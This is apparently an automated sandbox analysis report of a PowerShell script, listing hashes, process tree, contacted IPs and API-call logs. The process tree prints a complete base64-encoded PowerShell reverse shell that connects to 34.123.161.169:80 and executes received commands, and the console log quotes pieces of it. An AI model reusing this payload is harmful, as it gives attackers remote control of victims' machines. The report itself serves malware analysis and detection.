Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 14, 2021, 3:52 p.m.	Sept. 14, 2021, 3:54 p.m.

Size	4.2KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`bf2045debff7cbd7dc1210ca6535efd9`
SHA256	`863ce2c8e8a71189c0635389335df21623cfb8391ad48c5336c3b39855ec18c8`
CRC32	`C02B6C61`
ssdeep	`96:O74moOupl+ZYbi2eEJBZo7sbhoBHAuv7//g2TfodhJJYn:FmoOuplCYGQJBQMhoBH/vzg2TodhJWn`
Yara	Antivirus - Contains references to security software

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\34.64.143.34.ps1
1948
- powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -windowstyle hidden -Enc JAB0ACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAdQBzAGUAcgAzADIALgBkAGwAbAAiACkAXQAgAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAGIAbwBvAGwAIABTAGgAbwB3AFcAaQBuAGQAbwB3ACgAaQBuAHQAIABoAGEAbgBkAGwAZQAsACAAaQBuAHQAIABzAHQAYQB0AGUAKQA7ACcADQAKAGEAZABkAC0AdAB5AHAAZQAgAC0AbgBhAG0AZQAgAHcAaQBuACAALQBtAGUAbQBiAGUAcgAgACQAdAAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABuAGEAdABpAHYAZQANAAoAWwBuAGEAdABpAHYAZQAuAHcAaQBuAF0AOgA6AFMAaABvAHcAVwBpAG4AZABvAHcAKAAoAFsAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6AEcAZQB0AEMAdQByAHIAZQBuAHQAUAByAG8AYwBlAHMAcwAoACkAIAB8ACAARwBlAHQALQBQAHIAbwBjAGUAcwBzACkALgBNAGEAaQBuAFcAaQBuAGQAbwB3AEgAYQBuAGQAbABlACwAIAAwACkADQAKAA0ACgAkAGMAbABpAGUAbgB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AUwBvAGMAawBlAHQAcwAuAFQAQwBQAEMAbABpAGUAbgB0ACgAIgAzADQALgAxADIAMwAuADEANgAxAC4AMQA2ADkAIgAsACAAOAAwACkAOwANAAoAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsADQAKAA0ACgBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AA0ACgB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApACAAewANAAoAIAAgACAAIAAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwANAAoAIAAgACAAIAAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7AA0ACgAgACAAIAAgACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsADQAKACAAIAAgACAAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7AA0ACgAgACAAIAAgACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAA0ACgB9ADsADQAKAA0ACgAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
  2848
  - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\77qerqcd.cmdline"
    2312
    - cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESA235.tmp" "c:\Users\test22\AppData\Local\Temp\CSCA224.tmp"
      236

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
34.123.161.169	Active	Moloch
34.64.143.34	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 14, 2021, 3:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 14, 2021, 3:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:52 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 14, 2021, 3:52 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 14, 2021, 3:52 p.m.			0	0

Command line console output was observed (30 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: False console_handle: 0x00000013	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: New-Object : Exception calling ".ctor" with "2" argument(s): "A connection atte console_handle: 0x00000027	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: mpt failed because the connected party did not properly respond after a period console_handle: 0x00000033	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: of time, or established connection failed because connected host has failed to console_handle: 0x0000003f	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: respond 34.123.161.169:80" console_handle: 0x0000004b	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: At line:5 char:21 console_handle: 0x00000057	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + $client = New-Object <<<< System.Net.Sockets.TCPClient("34.123.161.169", 80) console_handle: 0x00000063	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + CategoryInfo : InvalidOperation: (:) [New-Object], MethodInvoca console_handle: 0x0000007b	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: tionException console_handle: 0x00000087	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + FullyQualifiedErrorId : ConstructorInvokedThrowException,Microsoft.Power console_handle: 0x00000093	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: Shell.Commands.NewObjectCommand console_handle: 0x0000009f	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: At line:6 char:28 console_handle: 0x000000cb	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + $stream = $client.GetStream <<<< (); console_handle: 0x000000d7	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + CategoryInfo : InvalidOperation: (GetStream:String) [], Runtime console_handle: 0x000000e3	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: Exception console_handle: 0x000000ef	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x000000fb	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x00000023	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: At line:9 char:25 console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + while(($i = $stream.Read <<<< ($bytes, 0, $bytes.Length)) -ne 0) { console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + CategoryInfo : InvalidOperation: (Read:String) [], RuntimeExcep console_handle: 0x00000047	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: tion console_handle: 0x00000053	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: You cannot call a method on a null-valued expression. console_handle: 0x0000007f	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: At line:18 char:14 console_handle: 0x0000008b	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + $client.Close <<<< () console_handle: 0x00000097	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + CategoryInfo : InvalidOperation: (Close:String) [], RuntimeExce console_handle: 0x000000a3	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: ption console_handle: 0x000000af	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: + FullyQualifiedErrorId : InvokeMethodOnNull console_handle: 0x000000bb	1	1
WriteConsoleW Sept. 14, 2021, 3:52 p.m.	buffer: PS C:\Users\test22\AppData\Local\Temp> console_handle: 0x000000c7	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 94 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04f8d690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x04f8d690 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8d90 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c99d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c99d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c99d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c96d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c96d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c96d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c96d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c96d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c96d0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9410 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9490 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9b10 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8dd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c9790 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8fd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8fd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8fd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8fd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8fd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8fd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8fd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 14, 2021, 3:52 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x005c8fd0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 14, 2021, 3:52 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 183 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0267b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0268f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02659000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05730000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02689000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 655360 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06510000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06570000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06571000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06572000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06573000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06574000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x06575000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x056e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 1948 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029b3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 2097152 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029d0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02b90000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73031000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f1a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73032000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 14, 2021, 3:52 p.m.	process_identifier: 2848 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f12000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
